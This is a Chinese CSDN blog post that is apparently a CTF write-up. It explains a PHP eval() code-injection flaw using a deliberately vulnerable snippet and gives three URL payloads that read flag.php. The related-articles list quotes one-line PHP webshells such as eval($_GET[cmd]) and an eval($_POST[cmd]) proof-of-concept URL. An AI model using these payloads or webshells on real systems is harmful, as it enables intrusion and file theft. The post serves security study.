eval代码执行漏洞

最新推荐文章于 2024-04-30 09:56:59 发布
最新推荐文章于 2024-04-30 09:56:59 发布
阅读量5.7k 收藏 4
点赞数
分类专栏: web类 文章标签: 代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/101147330
版权

eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
看一则样例

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source (__FILE__); 
?> 
------------------------
include “flag.php”: include 语句包含并运行指定文件。
$_REQUEST[‘hello’]: 通过 GET,POST 和 COOKIE 传递参数
var_dump($a) : 输出变量的相关信息
eval(): 把字符串当作命令直接执行
show_source() : 函数对文件进行语法高亮显示。
FILE: 当前文件
--------------------

方法一

?hello=1);print_r(file(%22./flag.php%22));//

相当于:eval( “var_dump(1);print_r(file(”./flag.php"));//);");
eval函数将引号内的字符串作为语句运行,所以//仅注释);
方法二

?hello=file('flag.php')

file() 函数把整个文件读入一个数组中。(注意参数是字符串)
方法三

?hello=1);show_source(%27flag.php%27);var_dump(

先提亮,然后输出

ChenZIDu
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php漏洞eval,Web安全之代码执行漏洞
weixin_36440677的博客
03-11 1790
原标题:Web安全之代码执行漏洞内容1、代码执行漏洞的概述2、代码执行漏洞的危害3、代码执行漏洞的利用4、代码执行漏洞的防御 背景介绍在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。例子PHP CMS中 settings的内容:array('upl...
任意代码执行漏洞
LJH1999ZN的博客
02-23 3046
一、什么是任意代码执行漏洞 web应用程序是指程序员在代码中使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数执行,从而造成安全漏洞 二、漏洞的危害 执行任意的代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器 三、任意代码执行漏洞 1.eval()函数 ...
RCE漏洞总结及绕过---代码执行
最新发布
qq_46603839的博客
04-30 816
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
python建议:警惕eval函数的安全漏洞
热门推荐
Neo
11-22 1万+
如果你了解JavaScript或者PHP等,那么你一定对eval()所有了解。如果你并没有接触过也没关系,eva()l函数的使用非常简单。 >>> eval("1+1==2") #进行判断 True >>> eval("'a'+'b'") #字符连接 'ab' >>> eval("4+5") #数字相加 9 >...
10.26_eval函数引起的命令执行漏洞
weixin_43460822的博客
10-26 3167
“百度杯”CTF比赛 2017 二月场 题目: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 这道题跟上道题有点类似,可以用上道题的方法试试,不行再换,不过题目给出的提示说flag不在变量中,所以很可能不行,但还是要试试. 构建paylo...
eval()不是魔鬼,只是被误解了(翻译)
weixin_34268753的博客
02-04 365
原文来自:https://www.nczonline.net/blog/2013/06/25/eval-isnt-evil-just-misunderstood/ 作者:Nicholas C.Zakas 在JavaScript中,我不确定是否有比eval()受到更多诽谤的。它就是个简单的函数被设计用来将字符串转换为可被执行的JavaScr...
php eval 黑客利用,代码安全审计:当file_exists遇上eval
weixin_28323057的博客
03-28 314
‍起因‍昨晚有人在一QQ群上问lcms(一款网站CMS系统)的一个漏洞是怎么形成的,说了半天。他截图不完整,于是叫他传代码,下载回来找到router.php代码片段如下:protectedfunctiongetInputString($name,$default_value="",$format="GPCS"){//orderofretrievedefaultGPCS(g...
JS eval代码快速解密实例解析
10-15
这是因为`eval`中的字符串被当作实际的JavaScript代码执行,从而恢复其原始功能。 **方法二:创建HTML文件输出** 另一种解密方法是创建一个新的HTML文件,利用`document.write`将混淆的`eval`代码输出到页面上。在...
第五节 命令执行漏洞利用-01
09-15
在命令执行漏洞案例演示中,我们将使用菜刀连接命令执行的位置,也被称为代码执行。POC 如下所示: /search.php?searchtype=5&tid=&area=eval($_POST[cmd]) 在上面的 POC 中,我们使用 eval 函数执行用户输入的...
php代码审计-代码执行.pdf
12-14
在 PHP 中,有多种方式可以实现代码执行,包括 eval()、assert()、preg_replace() 等。下面我们将对这些方式进行详细的讲解和分析。 一、 eval() 函数 eval() 函数是 PHP 中的一种语言构造器,用于将字符串作为 ...
php eval函数用法总结
10-27
如果代码执行正常,`eval()` 会返回 `NULL`,如果有解析错误,它则返回 `false`。重要的是,`return` 语句会在代码字符串中立即终止执行。 **示例** 下面是一个简单的`eval()`使用示例: ```php $string = ...
eval与window.eval的差别分析
10-28
由于这个特性,`eval`具有很高的风险,因为它允许运行不受信任的代码,可能导致安全漏洞。在上述代码示例中,`eval`被用于解析JSON字符串,这是常见的用法,但也存在替代方案,如使用`JSON.parse()`函数。 `eval`的...
php+利用eval,PHP的一个EVAL的利用防范
weixin_39690958的博客
03-19 201
作者:phpeval前段时间一个程序出的问题。就和这差不多。复制代码代码如下:$code="${${eval($_GET[c])}}";?>对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码执行了。(好些PHP的...
php eval 黑客利用,eval一句话木马详细讲解
weixin_29184075的博客
03-28 2407
来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部...
PHP代码函数执行漏洞
知足且坚定,温柔且上进
04-07 1744
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1758
php命令执行基础与CTF例题分析
php函数漏洞总结
qq_37410729的博客
07-31 1344
php一些漏洞函数
PHP漏洞利用和渗透基础入门[2]
落叶花雪的博客
06-25 334
登录注入实例 提示:了解Mysql和php可能更容易理解 构造Mysql语句时利用一些方法使某些不应该返回的数据返回或者执行某种不该执行的命令 这个过程就叫注入 那我们来举个例子: $sql='select * from users where userName='$userName' and password='$password'; 代码逻辑(建议阅读)来自: https://blog....
python eval 安全_Python中eval带来的潜在风险
weixin_39870092的博客
12-10 439
0x00 前言eval是Python用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码:>>>eval("1+2")>>>eval("[xforxinrange(10)]")[0,1,2,3,4,5,6,7,8,9]当内存中的内置模块含有os的话,eval同样可以做到命令执行:>...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值